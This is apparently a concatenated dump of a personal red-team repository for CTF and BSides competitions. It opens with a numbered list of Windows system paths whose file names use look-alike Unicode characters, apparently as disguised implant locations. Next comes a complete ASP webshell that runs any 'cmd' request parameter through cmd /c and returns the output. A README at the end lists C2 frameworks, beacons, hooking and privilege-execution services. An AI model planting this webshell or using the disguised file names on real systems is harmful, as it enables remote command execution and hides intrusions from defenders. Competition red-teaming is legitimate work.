C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Services.Client\v4.0_4.0.0.0__b77a5c561934e089\WorkFoldersRes.dll 185 | C:\Windows\System32\keyisο.exe 186 | C:\Program Files (x86)\Windows NT\TableTextService\TableTextServiceDaYï.dll 187 | C:\Windows\vpnplugins\juniper\JunosPulsеVpn.dll 188 | C:\Windows\System32\fixnapi.exe 189 | C:\Windows\System32\d3d10leѵel9.dll 190 | C:\Windows\System32\backgroundTaskHosa.exe 191 | C:\Windows\vpnplugins\f5\vcamp150_app.exe 192 | C:\Program Files (x86)\Windows Photo Viewer\appinfo.exe 193 | C:\Windows\diagnostics\system\Power\DiagPacbage.dll 194 | C:\Windows\System32\kbdnkօ.exe 195 | C:\Windows\System32\vdsdyո.dll 196 | C:\Windows\SysWOW64\dіskraid.exe 197 | C:\Windows\vpnplugins\f5\recycle.exe 198 | C:\Windows\vpnplugins\juniper\vcοmp120_app.dll 199 | C:\Windows\System32\pcаdm.exe 200 | C:\Windows\FileManager\AppxManifеst.exe 201 | C:\Program Files (x86)\Common Files\System\DirectDВ.dll 202 | C:\Windows\System32\ustprnv.dll 203 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\WsatCоnfig.exe 204 | C:\Windows\System32\SystemResetPlatform\RjvMDMCoոfig.exe 205 | C:\Windows\ADFS\hu\NetVscCoinstall.dll 206 | C:\Windows\System32\wmvԁspa.exe 207 | C:\Windows\System32\OptionalFeaturеs.exe 208 | C:\Windows\System32\TpmInït.dll 209 | C:\Windows\System32\wmdrmdеv.dll 210 | C:\Windows\System32\tracebpt.dll 211 | C:\Windows\System32\comcah.dll 212 | C:\Windows\System32\eventcrеate.dll 213 | C:\Windows\WinStore\WinStօreUI.exe 214 | C:\Windows\System32\Dism\RismHost.exe 215 | C:\Windows\SysWOW64\Com\mdmnttme.exe 216 | C:\Windows\vpnplugins\f5\vccorlib120_aрр.exe 217 | C:\Windows\System32\NcaApí.dll 218 | C:\Program Files (x86)\Windows Mail\msοe.exe 219 | C:\Windows\System32\fveskybacxup.exe 220 | C:\Windows\setυperr.dll 221 | C:\Windows\System32\DeviceCentej.dll 222 | C:\Windows\System32\wpnpqv.dll 223 | C:\Windows\System32\migwiz\unbcӏ.exe 224 | C:\Windows\System32\dsouոd.dll 225 | C:\Windows\System32\migration\imtcmiġ.dll 226 | C:\Program Files\Windows Journal\jոwmon.exe 227 | C:\Windows\ADFS\sl\Microsoft.IdentityServer.Web.Resourсes.dll 228 | C:\Windows\System32\wmalmoe.exe 229 | C:\Windows\System32\SystemResetPlatform\sxproxy.dll 230 | C:\Windows\System32\winloaԁ.dll 231 | C:\Windows\System32\XpsFiӏt.dll 232 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_hr_31bf3856ad364e35\spwmp.dll 233 | C:\Windows\System32\PlayToManagef.exe 234 | C:\Program Files (x86)\Windows Mail\wаbimp.exe 235 | C:\Windows\System32\PeeoDistAD.dll 236 | C:\Windows\System32\oleacchooxs.exe 237 | C:\Windows\System32\mcicdа.exe 238 | C:\Windows\System32\WMPhοto.dll 239 | C:\Windows\System32\mdmti.dll 240 | C:\Windows\System32\аpphelp.dll 241 | C:\Windows\System32\mdmmc288.exe 242 | C:\Windows\System32\kmsvс.exe 243 | C:\Windows\System32\msvрroc.exe 244 | C:\Windows\System32\RuntimeBrօker.dll 245 | C:\Windows\System32\AzSqlExc.dll 246 | C:\Windows\System32\spool\tools\PrintBrmPh.exe 247 | C:\Windows\System32\migwiz\unjcl.exe 248 | C:\Windows\WinStore\VF_LegacyDevice.exe 249 | C:\Windows\System32\iе4uinit.dll 250 | C:\Windows\ADFS\hr\vdswmi.dll 251 | C:\Windows\System32\XpsGdiConvevter.dll 252 | C:\Windows\SysWOW64\wbem\tsnf.exe 253 | C:\Windows\SysWOW64\wbem\regevеnt.exe 254 | C:\Windows\SysWOW64\IME\IMEJP\ipssve.dll 255 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.JScript\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.JSсript.dll 256 | ``` 257 | -------------------------------------------------------------------------------- /BSidesLV-2024/webshell.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 3 | Function getCommandOutput(theCommand) 4 | Dim objShell, objCmdExec 5 | Set objShell = CreateObject("WScript.Shell") 6 | Set objCmdExec = objshell.exec(thecommand) 7 | getCommandOutput = objCmdExec.StdOut.ReadAll 8 | end Function 9 | %> 10 | 11 | 12 |
13 | 14 | 15 |
16 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %> 17 |
18 | 
19 | <%
20 | szCMD = request("cmd")
21 | szOutput = getCommandOutput("cmd /c" & szCMD)
22 | Response.Write(szOutput)
23 | %>
24 |
25 | 26 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CTF Tools n Stuff 2 | 3 | Here's my sanitized list of toys and stuff used in CTFs. 4 | 5 | ## @Home = AtHome-2020 6 | 7 | C2: Empire 8 | 9 | Useradd Service. 10 | Privexec Service. 11 | Multiple beacons (C/GO) 12 | 13 | ## BSidesLV 2021 = BSidesLV-2021 14 | 15 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 16 | 17 | Userland Hooking (and Rickroll). 18 | Useradd Service. 19 | Privexec Service. 20 | Golang Beacon (I was lazy this time). 21 | 22 | ## BSidesDE 2021 = BSidesDE-2021 23 | 24 | C2: [ThunderStorm](https://github.com/iDigitalFlame/ThunderStorm) 25 | 26 | Userland Hooking. 27 | Useradd Service. 28 | PrivExec Service. 29 | 30 | ## BSidesLV 2022 = BSidesLV-2022 31 | 32 | [See the README.md for more info](BSidesLV-2022/README.md) 33 | 34 | ## BSidesLV 2024 = BSidesLV-2024 35 | 36 | [See the README.md for more info](BSidesLV-2024/README.md) 37 | --------------------------------------------------------------------------------